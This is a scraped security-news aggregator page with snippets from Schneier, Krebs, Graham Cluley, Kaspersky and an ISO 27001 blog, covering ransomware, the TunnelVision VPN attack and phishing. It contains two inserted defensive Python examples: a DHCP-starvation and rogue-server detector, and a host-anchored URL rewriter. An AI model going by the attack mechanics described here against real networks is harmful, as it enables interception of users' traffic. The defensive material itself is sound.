According to the Department for Science, Innovation and Technology (DSIT), only 17% of the UK cyber sector workforce is female, and this is down from 22% in 2022.

As we know, the cyber sector is a male-dominated space, and therefore women aren’t necessarily presented with the same opportunities.

For instance, they might shy away from applying to a cybersecurity role unless they match every single piece of criteria.

Is there anything that can be used to incentivise women to work in the cyber sector?

Prominent female role models and leaders are crucial when it comes to making cyber more attractive for women.

1 week, 2 days ago @ itsecurityguru.org
SecurityTrails
last post None
Blogs 👨‍💻
Бизнес без опасности
last post None
Жизнь 80 на 20
last post 8 months ago
ISO Survey 2022: ISO 27001 certificates (ISMS)

ISO Survey 2022: ISO 27001 certificates (ISMS) from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001
ISO has published fresh statistics on the certificates issued. I, in turn, have updated my presentation on ISO 27001 (ISMS) certificates.
In total, 71,549 ISO 27001 certificates were registered in 2022. That is 22% more than in 2021.
Top 10 countries by number of certificates:
1. China - 26301
2. Japan - 6987
3. United Kingdom of Great Britain and Northern Ireland - 6084
4. India - 2969
5. Italy - 2424
6. United States of America - 1980
7. Netherlands - 1741
8. Germany - 1582
9. Spain - 1561
10. Israel - 1467
For comparison, in Russia only 30 certificates were registered (remained) in 2022, while in 2021 there were 95…

8 months ago @ 80na20.blogspot.com
My first course on Udemy. Preparing for an ISMS certification audit

I have published my first course on Udemy, on preparing for an ISMS certification audit under ISO 27001: "ISO 27001:2022. How to prepare for a certification audit". In it I go through the tasks that need to be done before, during and after the certification audit. The course is in English.

8 months ago @ 80na20.blogspot.com
Cybersecurity Frameworks

Cybersecurity Frameworks for DMZCON23 230905.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

8 months, 2 weeks ago @ 80na20.blogspot.com
Another presentation of mine about mind maps

My 15 Years of Experience in Using Mind Maps for Business and Personal Purposes from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

8 months, 4 weeks ago @ 80na20.blogspot.com
NIST CSF 2.0, draft

From NIST CSF 1.1 to 2.0.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

8 months, 4 weeks ago @ 80na20.blogspot.com
ZLONOV
last post None
Artem Ageev’s Blog
last post None
Киберпиздец
last post 8 months, 3 weeks ago
Hi everyone. I disappeared, I confess, too much work :( Meanwhile I have brought you a 40% discount on all Linux Foundation courses and certifications. The discount is valid today only. If anyone has long been planning to take something serious on k8s, Linux or DevOps, now is the time. For ex

Hi everyone. I disappeared, I confess, too much work :( Meanwhile I have brought you a 40% discount on all Linux Foundation courses and certifications. The discount is valid today only. If anyone has long been planning to take something serious on k8s, Linux or DevOps, now is the time. For example, Certified Kubernetes Administrator (CKA) and Certified Kubernetes Security Specialist (CKS) as a bundle cost $435 instead of $725. The exam can be taken within a year of purchase
> https://training.linuxfoundation.org/end-of-summer-2023/

8 months, 3 weeks ago @ t.me
Schneier on Security
last post 11 hours ago
Friday Squid Blogging: Emotional Support Squid

When asked what makes this an “emotional support squid” and not just another stuffed animal, its creator says:
They’re emotional support squid because they’re large, and cuddly, but also cheerfully bright and derpy.

They make great neck pillows (and you can fidget with the arms and tentacles) for travelling, and, on a more personal note, when my mum was sick in the hospital I gave her one and she said it brought her “great comfort” to have her squid tucked up beside her and not be a nuisance while she was sleeping.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog postin…

11 hours ago @ schneier.com
FBI Seizes BreachForums Website

The FBI has seized the BreachForums website, used by ransomware criminals to leak stolen corporate data.

[…] The FBI is requesting victims and individuals contact them with information about the hacking forum and its members to aid in their investigation.

The seizure messages include ways to contact the FBI about the seizure, including an email, a Telegram account, a TOX account, and a dedicated page hosted on the FBI’s Internet Crime Complaint Center (IC3).

“The Federal Bureau of Investigation (FBI) is investigating the criminal hacking forums known as BreachForums and Raidforums,” reads a dedicated subdomain on the FBI’s IC3 portal.

Raidforums (hosted at raidforums.com and run by Omnipoten…

21 hours ago @ schneier.com
Zero-Trust DNS

Microsoft is working on a promising-looking protocol to lock down DNS.

ZTDNS aims to solve this decades-old problem by integrating the Windows DNS engine with the Windows Filtering Platform—the core component of the Windows Firewall—directly into client devices.

A separate allow list will contain IP address subnets that clients need to run authorized software.

Networking security expert Royce Williams (no relation to Jake Williams) called this a “sort of a bidirectional API for the firewall layer, so you can both trigger firewall actions (by input *to* the firewall), and trigger external actions based on firewall state (output *from* the firewall).

So instead of having to reinvent the firew…

1 day, 22 hours ago @ schneier.com
Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak:
I’m giving a webinar via Zoom on Wednesday, May 22, at 11:00 AM ET.

The topic is “Should the USG Establish a Publicly Funded AI Option?”
The list is maintained on this page.

Posted on May 14, 2024 at 12:04 PM • 0 Comments

3 days, 16 hours ago @ schneier.com
Another Chrome Vulnerability

Google has patched another Chrome zero-day:
On Thursday, Google said an anonymous source notified it of the vulnerability.

The vulnerability carries a severity rating of 8.8 out of 10.

In response, Google said, it would be releasing versions 124.0.6367.201/.202 for macOS and Windows and 124.0.6367.201 for Linux in subsequent days.

“Google is aware that an exploit for CVE-2024-4671 exists in the wild,” the company said.

Google didn’t provide any other details about the exploit, such as what platforms were targeted, who was behind the exploit, or what they were using it for.

3 days, 22 hours ago @ schneier.com
LLMs’ Data-Control Path Insecurity

Signaling System 7—SS7 for short—split up the two and became a phone system standard in the 1980s.

This general problem of mixing data with commands is at the root of many of our computer security vulnerabilities.

As we build AI systems, we are going to have to balance the power that generative AI provides with the risks.

But generative AI comes with a lot of security baggage—in the form of prompt-injection attacks and other security risks.

We need to take a more nuanced view of AI systems, their uses, their own particular risks, and their costs vs. benefits.

4 days, 22 hours ago @ schneier.com
Friday Squid Blogging: Squid Mating Strategies

Some squids are “consorts,” others are “sneakers.” The species is healthiest when individuals have different strategies randomly.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Posted on May 10, 2024 at 5:07 PM • 0 Comments

1 week ago @ schneier.com
New Attack Against Self-Driving Car AI

The result is the camera capturing an image full of lines that don’t quite match each other.

Because it’s full of lines that don’t match, the classifier doesn’t recognize the image as a traffic sign.

This meant an unrecognizable image wasn’t just a single anomaly among many accurate images, but rather a constant unrecognizable image the classifier couldn’t assess, and a serious security concern.

The first was GhostStripe1, which is not targeted and does not require access to the vehicle, we’re told.

GhostStripe2 is targeted and does require access to the vehicle, which could perhaps be covertly done by a hacker while the vehicle is undergoing maintenance.

1 week ago @ schneier.com
How Criminals Are Using Generative AI

About Bruce Schneier
I am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

1 week, 1 day ago @ schneier.com
New Attack on VPNs

This attack has been feasible for over two decades:
Researchers have devised an attack against nearly all virtual private network applications that forces them to send and receive some or all traffic outside of the encrypted tunnel designed to protect it from snooping or tampering.

TunnelVision, as the researchers have named their attack, largely negates the entire purpose and selling point of VPNs, which is to encapsulate incoming and outgoing Internet traffic in an encrypted tunnel and to cloak the user’s IP address.

The researchers believe it affects all VPN applications when they’re connected to a hostile network and that there are no ways to prevent such attacks except when the user’s V…

1 week, 3 days ago @ schneier.com
New Lawsuit Attempting to Make Adversarial Interoperability Legal

1 week, 4 days ago @ schneier.com
Friday Squid Blogging: Squid Purses

2 weeks ago @ schneier.com
My TED Talks

2 weeks ago @ schneier.com
Rare Interviews with Enigma Cryptanalyst Marian Rejewski

2 weeks ago @ schneier.com
The UK Bans Default Passwords

The UK is the first country to ban default passwords on IoT devices.

On Monday, the United Kingdom became the first country in the world to ban default guessable usernames and passwords from these IoT devices.

The Product Security and Telecommunications Infrastructure Act 2022 (PSTI) introduces new minimum-security standards for manufacturers, and demands that these companies are open with consumers about how long their products will receive security updates for.

California banned default passwords in 2018, with the law taking effect in 2020.

IoT manufacturers aren’t making two devices, one for California and one for the rest of the US.

2 weeks, 1 day ago @ schneier.com
Krebs On Security
last post 3 days, 12 hours ago
Patch Tuesday, May 2024 Edition

There are also important security patches available for macOS and Adobe users, and for the Chrome Web browser, which just patched its own zero-day flaw.

Five days ago, Google released a security update for Chrome that fixes a zero-day in the popular browser.

Apple has just shipped macOS Sonoma 14.5 update, which includes nearly two dozen security patches.

Finally, Adobe has critical security patches available for a range of products, including Acrobat, Reader, Illustrator, Adobe Substance 3D Painter, Adobe Aero, Adobe Animate and Adobe Framemaker.

Anyone in charge of maintaining Windows systems in an enterprise environment should keep an eye on askwoody.com, which usually has the scoop on a…

3 days, 12 hours ago @ krebsonsecurity.com
How Did Authorities Identify the Alleged Lockbit Boss?

The Treasury filing says Khoroshev used the emails [email protected], and [email protected].

Cyber intelligence firm Intel 471 finds that [email protected] was used by a Russian-speaking member called Pin on the English-language cybercrime forum Opensc.

In response to an Exploit member who complained that the security industry was making it harder to profit from ransomware, Putinkrab said that was because so many cybercriminals were relying on crappy ransomware code.

Contact with the owner of the key is lost over time.”

Putinkrab said he had every confidence his ransomware code was a game-changer, and a huge money machine.

The Justice Department says the LockBit ransomware affiliate prog…

4 days, 21 hours ago @ krebsonsecurity.com
U.S. Charges Russian Man as Boss of LockBit Ransomware Group

The United States joined the United Kingdom and Australia today in sanctioning 31-year-old Russian national Dmitry Yuryevich Khoroshev as the alleged leader of the infamous ransomware group LockBit.

The government says LockBit victims included individuals, small businesses, multinational corporations, hospitals, schools, nonprofit organizations, critical infrastructure, and government and law-enforcement agencies.

One of the victims LockBitSupp continued extorting was Fulton County, Ga. Eve LockBit’s darknet sites.

KrebsOnSecurity has been in intermittent contact with LockBitSupp for several months over the course of reporting on different LockBit victims.

The government says Russian nation…

1 week, 3 days ago @ krebsonsecurity.com
Why Your VPN May Not Be As Secure As It Claims

When a device initially tries to connect to a network, it broadcasts a message to the entire local network stating that it is requesting an Internet address.

VPNs work by creating a virtual network interface that serves as an encrypted tunnel for communications.

Once the network’s legitimate DHCP server is completely tied up, the attacker can then have their rogue DHCP server respond to all pending requests.

“This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server,” the researchers wrote.

“VPNs weren’t designed to keep you more secure on your local network, but to keep your traffic more secure on the …

1 week, 4 days ago @ krebsonsecurity.com
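The two moves the researchers describe above, tying up the legitimate DHCP server and then answering the pending requests from a rogue one, leave a visible trace in DHCP logs: a burst of DISCOVERs from many client MACs, followed by OFFERs from a server address that is not the site's. The detector below is an added example and is not code from the researchers or from the article. The syslog-like line format, the trusted-server set and the thresholds are assumptions made for the demo, and the log it runs on is constructed inline.

```python
"""Flag a DHCP-starvation burst and offers from an unlisted server.

Added example, not code from the article or the researchers it quotes.
The log format is a constructed, syslog-like shape assumed for this demo;
real DHCP servers and sensors log differently, so adapt LINE_RE.
"""
import re
from datetime import datetime, timedelta

# Assumed line shapes (constructed for this example):
#   <iso-ts> DHCPDISCOVER from <mac>
#   <iso-ts> DHCPOFFER <ip> to <mac> server <ip>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) DHCP(?P<kind>DISCOVER|OFFER)"
    r"(?: (?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"
    r" (?:from|to) (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: server (?P<server>\d{1,3}(?:\.\d{1,3}){3}))?$"
)


def parse_line(line):
    """Return a dict for a recognised line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def analyze(lines, trusted_servers, window_s=10, starvation_threshold=20):
    """Detect the two halves of the attack the article describes.

    1. Starvation: a burst of DISCOVERs from many distinct client MACs
       inside a short window (the attacker exhausting the legitimate pool).
    2. Rogue offers: any OFFER whose server address is not on the allowlist
       (the attacker's server answering the now-unanswered requests).
    """
    events = [ev for ev in map(parse_line, lines) if ev]
    discovers = sorted((ev for ev in events if ev["kind"] == "DISCOVER"),
                       key=lambda ev: ev["ts"])

    peak = 0
    start = 0
    for i, ev in enumerate(discovers):
        # slide the window so that it spans at most window_s seconds
        while (ev["ts"] - discovers[start]["ts"]) > timedelta(seconds=window_s):
            start += 1
        peak = max(peak, len({d["mac"] for d in discovers[start:i + 1]}))

    # An OFFER without a server field is treated as untrusted too.
    rogue = [(ev["ip"], ev["mac"], ev["server"])
             for ev in events
             if ev["kind"] == "OFFER" and ev["server"] not in trusted_servers]

    return {
        "starvation": peak >= starvation_threshold,
        "peak_distinct_macs": peak,
        "rogue_offers": rogue,
    }


def build_sample_log():
    """Constructed log: 25 DISCOVERs from 25 MACs in under five seconds,
    then an OFFER from 10.0.0.250, which is not the site's DHCP server."""
    base = datetime(2024, 5, 9, 10, 0, 0)
    lines = []
    for i in range(25):
        ts = (base + timedelta(milliseconds=200 * i)).isoformat()
        lines.append(f"{ts} DHCPDISCOVER from 02:00:00:00:00:{i:02x}")
    ts = (base + timedelta(seconds=6)).isoformat()
    lines.append(f"{ts} DHCPOFFER 10.0.0.77 to 02:00:00:00:00:05 server 10.0.0.250")
    lines.append(f"{ts} DHCPOFFER 10.0.0.23 to 02:00:00:00:00:07 server 10.0.0.1")
    lines.append("noise line that does not parse")
    return lines


if __name__ == "__main__":
    print(analyze(build_sample_log(), trusted_servers={"10.0.0.1"}))
```

The starvation rule on its own fires on a busy reconnect storm too, so in practice it is the pairing that matters: a burst of DISCOVERs and, shortly after, OFFERs from an address that was never the site's DHCP server.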
Man Who Mass-Extorted Psychotherapy Patients Gets Six Years

Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours.

When Vastaamo declined to pay, ransom_man shifted to extorting individual patients.

KrebsOnSecurity detailed the work of HTP in September 2013, after the group compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.

The group used the same ColdFusion flaws to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to the U.S. Federal Bureau of Investigation (FBI).

Ransom_man bragged about Vastaamo’s sloppy security, noting the company had used the laughably weak username and password “root/root” to p…

2 weeks, 3 days ago @ krebsonsecurity.com
FCC Fines Major U.S. Wireless Carriers for Selling Customer Location Data

In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.

The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities.

The carriers promised to “wind down” location data sharing agreements with third-party companies.

The fine amounts vary because they were calculated based in part on each day that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements).

The FCC notes that AT&T and Verizon took more…

2 weeks, 4 days ago @ krebsonsecurity.com
Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme

The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps.

Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia.

In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data.

The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars.

The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.

3 weeks, 4 days ago @ krebsonsecurity.com
Who Stole 3.6M Tax Records from South Carolina?

Rescator said the data exposed included employer, name, address, phone, taxable income, tax refund amount, and bank account number.

KrebsOnSecurity sought comment from the Secret Service, South Carolina prosecutors, and Mr. Keel’s office.

The AP says South Carolina paid $12 million to Experian for identity theft protection and credit monitoring for its residents after the breach.

Mr. Keel’s assertion that somehow the efforts of South Carolina officials following the breach may have lessened its impact on citizens seems unlikely.

It remains unclear why Shefel has never been officially implicated in the breaches at Target, Home Depot, or in South Carolina.

1 month ago @ krebsonsecurity.com
Crickets from Chirp Systems in Smart Lock Key Leak

The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021.

Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

Neither August nor Chirp Systems responded to requests for comment.

It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state t…

1 month ago @ krebsonsecurity.com
Why CISA is Warning CISOs About a Breach at Sisense

CISA urged all Sisense customers to reset any credentials and secrets that may have been shared with the company, which is the same advice Sisense gave to its customers Wednesday evening.

It is clear, however, that unknown attackers now have all of the credentials that Sisense customers used in their dashboards.

Beyond that, it is largely up to Sisense customers to decide if and when they change passwords to the various third-party services that they’ve previously entrusted to Sisense.

But when confronted with the details shared by my sources, Sisense apparently changed its mind.

“If they are hosting customer data on a third-party system like Amazon, it better damn well be encrypted,” Weave…

1 month ago @ krebsonsecurity.com
Twitter’s Clumsy Pivot to X.com Is a Gift to Phishers

On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead.

Those include carfatwitter.com, which Twitter/X will now truncate to carfax.com when the domain appears in user messages or tweets.

A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan.

The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registr…

1 month, 1 week ago @ krebsonsecurity.com
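The mistake described above is a plain substring replacement applied to hostnames, which is why "netflitwitter.com" comes out as "netflix.com". The snippet below is an added example, not Twitter/X's code: it reproduces that naive rewrite beside a version that parses each URL and rewrites only when the parsed host is twitter.com or one of its subdomains. The URL regex and the set of hosts treated as Twitter are assumptions made for the demo.

```python
"""Naive substring rewrite of "twitter.com" versus a host-anchored rewrite.

Added example, not Twitter/X's code. The URL regex and the set of hosts
treated as Twitter are assumptions made for this demo.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# Assumed: a rough matcher for http(s) links embedded in free text.
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def naive_rewrite(text):
    """The behaviour the article describes: replace every occurrence of the
    substring "twitter.com", wherever it sits inside a hostname."""
    return text.replace("twitter.com", "x.com")


def host_is_twitter(host):
    """True only for twitter.com itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return host == "twitter.com" or host.endswith(".twitter.com")


def safe_rewrite(text):
    """Rewrite only URLs whose *parsed* host is twitter.com or a subdomain,
    leaving look-alike domains such as netflitwitter.com untouched."""
    def fix(match):
        url = match.group(0)
        parts = urlsplit(url)
        host = parts.hostname or ""
        if not host_is_twitter(host):
            return url
        # keep any subdomain label, swap the registered domain only
        new_host = host[: -len("twitter.com")] + "x.com"
        if parts.port:
            new_host += f":{parts.port}"
        # userinfo (user:pass@) is dropped on purpose; it is a phishing trick anyway
        return urlunsplit(parts._replace(netloc=new_host))
    return URL_RE.sub(fix, text)


if __name__ == "__main__":
    for sample in ("https://netflitwitter.com/login", "https://twitter.com/krebsonsecurity"):
        print(sample, "->", naive_rewrite(sample), "|", safe_rewrite(sample))
```

The host-anchored version also leaves "twitter.com.evil.example" alone, because the registered domain there is evil.example; the naive version would happily rewrite it.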
April’s Patch Tuesday Brings Record Number of Fixes

Although to be fair, it would be tough for Microsoft to eclipse the number of vulnerabilities fixed in this month’s patch batch — a record 147 flaws in Windows and related software.

Microsoft today released updates to address 147 security holes in Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, DNS Server, Windows Defender, BitLocker, and Windows Secure Boot.

Childs said one of ZDI’s researchers found this vulnerability being exploited in the wild, although Microsoft doesn’t currently list CVE-2024-29988 as being exploited.

“BlackLotus can bypass functionality called secure boot, which is designed to block malware from being able to load when booting up.

Adobe has since clar…

1 month, 1 week ago @ krebsonsecurity.com
Fake Lawsuit Threat Exposes Privnote Phishing Sites

Fory66399 insisted that their website — privnote[.

The tornote.io website has a different color altogether.

The privatenote.io website also has a different color!

Other Privnote phishing domains that also phoned home to the same Internet address as pirwnote[.

A review of the passive DNS records tied to this address shows that apart from subdomains dedicated to tornote[.

How profitable are these private note phishing sites?

1 month, 1 week ago @ krebsonsecurity.com
‘The Manipulaters’ Improve Phishing, Still Fail at Opsec

Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions.

“Hello, we already leave that fud etc before year,” the Saim Raza identity wrote.

I already leave everything.”

Asked to elaborate on the police investigation, Saim Raza said he was freshly released from jail.

Now I want to start my new work.”

Exactly what that “new work” might entail, Saim Raza wouldn’t say.

“After your article our police put FIR on my [identity],” Saim Raza explained.

1 month, 2 weeks ago @ krebsonsecurity.com
Thread Hijacking: Phishes That Prey on Your Curiosity

Thread hijacking attacks.

Here’s the story of a recent thread hijacking attack in which a journalist was copied on a phishing email from the unwilling subject of a recent scoop.

Thread hijacking attacks are hardly new, but that is mainly true because many Internet users still don’t know how to identify them.

In contrast, thread hijacking campaigns tend to patiently prey on the natural curiosity of the recipient.

“We call these multi-persona phishing scams, and they’re often paired with thread hijacking,” Kalember said.

1 month, 2 weeks ago @ krebsonsecurity.com
Graham Cluley
last post 15 hours ago
Nissan reveals ransomware attack exposed 53,000 workers’ social security numbers

Nissan North America has revealed that extortionists who demanded a ransom after breaking into its external VPN and disrupted systems last year also stole the social security numbers of over 53,000 staff.

The security breach occurred on November 7, 2023.

Nissan has confirmed the accessed data does not include financial information related to the individual workers.

In January last year, Nissan North America discovered a "severely mismanaged" server had leaked the proprietary source code of its mobile apps and marketing tools.

In the same month, 17,998 Nissan North America customers were affected by a breach at a third-party service provider.

15 hours ago @ bitdefender.com
BreachForums seized! One of the world’s largest hacking forums is taken down by the FBI… again

1 day, 17 hours ago @ tripwire.com
Smashing Security podcast #372: The fake deepfake, and Estate insecurity

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get 20% off!

Support the show: You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

2 days, 10 hours ago @ grahamcluley.com
Black Basta ransomware group’s techniques evolve, as FBI issues new warning in wake of hospital attack

Security agencies in the United States have issued a new warning about the Black Basta ransomware group, in the wake of a high-profile attack against the healthcare giant Ascension.

The cyber attack last week forced the Ascension computer systems offline, and caused some hospital emergency departments to turn away ambulances "in order to ensure emergency cases are triaged immediately."

In a statement, Ascension confirmed that while its hospitals were providing healthcare, the ransomware attack meant that its electronic health records and other systems used to order tests, procedures, and medications were currently unavailable.

Now the FBI, CISA, and other US government agencies have release…

3 days, 22 hours ago @ exponential-e.com
Prison for cybersecurity expert selling private videos from inside 400,000 homes

A Korean cybersecurity expert has been sentenced to prison for illegally accessing and distributing private videos from vulnerable "wallpad" cameras in 400,000 private households.

The 41-year-old man, who has not been officially named, succeeded in remotely accessing 638 apartment complexes in South Korea.

He exploited over 400,000 smart home devices used by residents to operate their video security systems and other domestic functions.

The hacker was arrested by South Korea's national police agency at the end of 2022.

Investigators seized computer equipment and found 213 videos and 400,000 photos that had been illegally filmed inside homes through hacked wallpad cameras.

4 days, 15 hours ago @ bitdefender.com
Boeing refused to pay $200 million LockBit ransomware demand

Boeing has confirmed that it received a demand for a massive $200 million after a ransomware attack by the notorious LockBit hacking group in October 2023.

The indictment details Khoroshev's alleged criminal activities and references "a multinational aeronautical and defense corporation headquartered in Virginia" that received a ransom demand equivalent to approximately $200 million.

Ultimately, LockBit did publish some 43GB of data they claimed had been stolen from Boeing, claiming that negotiations with Boeing for the ransom payment had broken down.

It seems the extortionists bit off more than they could chew when asking for such an astronomical ransom payment.

LockBitSupp, meanwhile, has…

1 week ago @ bitdefender.com
$10 million reward offer for apprehension of unmasked LockBit ransomware leader

The real name of LockBitSupp, the kingpin of LockBit, has been a secret for years despite many attempts to unmask them.

Law enforcement's claims of disrupting the gang's operations were scorned by LockBitSupp, who even offered their own $10 million reward for anyone who was able to tell them their true identity.

Unsurprisingly, many amateur sleuths are using information released by the authorities in an attempt to learn more about Dmitry Khoroshev - and potentially win their share of a reward if he is ever detained.

And despite his claims of living the high life as a millionaire on a yacht with a bevy of young women, his life appears to be rather less glamorous.

And the spotlight being shone o…

1 week, 1 day ago @ exponential-e.com
FBI warns US retailers that hackers are targeting their gift card systems

1 week, 1 day ago @ tripwire.com
Cancer patients’ sensitive information accessed by “unidentified parties” after being left exposed by screening lab for years

A medical lab that specialises in cancer screenings has admitted to an alarming data breach that left sensitive patient information exposed for years - and accessible by unauthorised parties.

California-based Guardant Health is notifying affected individuals that information related to samples collected in late 2019 and 2020 was "inadvertently" left exposed online to the general public after an employee mistakenly uploaded it.

Worryingly, Guardant Health warns that the data was accessible for an extended period of time - from October 5, 2020 to February 29, 2024 - before being noticed by the company.

Guardant Health has not shared details of how many patients have had their privacy put at r…

1 week, 1 day ago @ bitdefender.com
Smashing Security podcast #371: Unmasking LockBitsupp, company extortion, and a Tinder fraudster

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by “Ransomware Sommelier” Allan Liska.

1 week, 2 days ago @ grahamcluley.com
Smashing Security podcast #370: The closed loop conundrum, default passwords, and Baby Reindeer

All this and much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Paul Ducklin.

2 weeks, 2 days ago @ grahamcluley.com
“Junk gun” ransomware: the cheap new threat to small businesses

3 weeks, 1 day ago @ tripwire.com
Hacker posts fake news story about Ukrainians trying to kill Slovak President

Czech news agency ČTK announced on Tuesday that a hacker had managed to break into its systems and published fake news reports of a plot to murder the president of a neighbouring country.

A follow-up fake news story published by the hacker on ČTK's website and mobile app claimed that Czech Foreign Minister Jan Lipavský had commented on the alleged murder plot.

The hacker's haste in publishing false news led to careless mistakes that tipped off readers to its lack of factual basis.

Last year, security researchers described how a hacking group called "Ghostwriter" affiliated with the Belarus government had gained access to media organisations' content management systems to post false stories.…

3 weeks, 1 day ago @ bitdefender.com
Smashing Security podcast #369: Keeping the lights on after a ransomware attack

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

3 weeks, 2 days ago @ grahamcluley.com
City street lights “misbehave” after ransomware attack

But the ransomware attack on Leicester City Council's infrastructure doesn't stop there.

As local media reports, residents have noticed that some street lights have been constantly shining, 24 hours a day, ever since.

He was told by the council that the ransomware attack had affected the city's "central management system" and had resulted in the street lights "misbehaving".

Perhaps it is surprising to some of us that street lights would be centrally controlled at all.

Even if the Leicester City Council wanted to pay the ransom (it says it will not),

The City Council says it will not be paying any ransom.

3 weeks, 2 days ago @ bitdefender.com
Companies 🏢
Kaspersky Blog
last post 23 hours ago
Two-stage targeted phishing via Dropbox | Kaspersky Blog

The first email. The attack begins when a message arrives in the victim's mailbox in the name of a real, existing audit firm.

Note that the email is sent from a genuine address on the company's mail server (most likely the attackers have taken over the mailbox).

The only thing that stands out is a remark that the report had to be re-sent using "Dropbox Application Secured Upload".

The apparent purpose of that phrase is to prepare the recipient for having to authenticate somehow in order to download the report.

But because the recipient has been "warmed up", they are more likely to go to the Dropbox site and try to open the document.

23 hours ago @ kaspersky.ru
How automakers sell driving data to insurers | Kaspersky Blog

Not long ago we wrote about how dangerous modern cars are in terms of the amount of data they collect about their owners.

It is a data broker that works with auto insurers and usually supplied them with information about drivers' accidents and fines.

Attempts to find clear warnings about this practice in the terms of use of General Motors' mobile apps, or in the privacy policy published on the OnStar site, were also unsuccessful.

However, it cannot be ruled out that sooner or later similar practices will be adopted in other regions too.

How to protect yourself from your car collecting driving data. Unfortunately, there is no universal advice on how…

2 days ago @ kaspersky.ru
Defending against popular cyberattack techniques and tactics in 2024

They appear both in attacks that were carried through to completion and caused damage, and in incidents stopped at an early stage.

We decided to list these techniques using the ATT&CK classification and to summarize the experts' recommendations for neutralizing them.

Attackers also actively look for and exploit publicly exposed IT-infrastructure management panels, from SSH servers to SNMP.

Regularly scan the external perimeter for vulnerabilities, and simply for applications that were exposed externally by accident and whose access should be revoked.

In 2023, old vulnerabilities in SMB v1 and Exchange Server were very popular, which confirms that IT departments pay insufficient attention to patching.

2 days, 19 hours ago @ kaspersky.ru
Critical vulnerabilities in Telit Cinterion (Gemalto, Thales) modems

Several serious vulnerabilities have been found in Telit Cinterion cellular M2M modems, including remote code execution (RCE) by sending SMS messages.

Critical vulnerabilities in Cinterion modems. In total, Kaspersky ICS-CERT experts found seven zero-day vulnerabilities in Telit Cinterion modems; the most dangerous is the first one on that list (CVE-2023-47610).

Cinterion was acquired by Gemalto in 2010.

Finally, in 2023 Thales sold the Cinterion modem line to Telit, and the deal produced the company Telit Cinterion.

In the near future our experts plan to publish detailed…

3 days, 16 hours ago @ kaspersky.ru
Распознавание позы человеческого тела с помощью сигнала Wi-Fi | Блог Касперского
Распознавание позы человеческого тела с помощью сигнала Wi-Fi | Блог Касперского Распознавание позы человеческого тела с помощью сигнала Wi-Fi | Блог Касперского

DensePose: методика распознавания человеческих поз на изображенияхНачать, впрочем, придется немного издалека — сперва следует разобраться с тем, как в целом работает точное распознавание человеческого тела и его позы.

С ее помощью они успешно распознавали человеческие позы на фотографиях — сугубо на основе двумерных картинок, без использования данных о третьей координате — глубине.

Also, if the images in the paper and the videos published by the researchers are to be believed, the system confidently handles fairly unusual body positions.

Next they ran DensePose, which recognized body positions using a camera installed next to the receiving rout…

5 days ago @ kaspersky.ru
How to protect yourself from phishing and malware on GitHub and GitLab | Kaspersky Blog

Project source code is published right there, fixes and additions to the code are proposed, and often a ready-made build of the application can be downloaded as well.

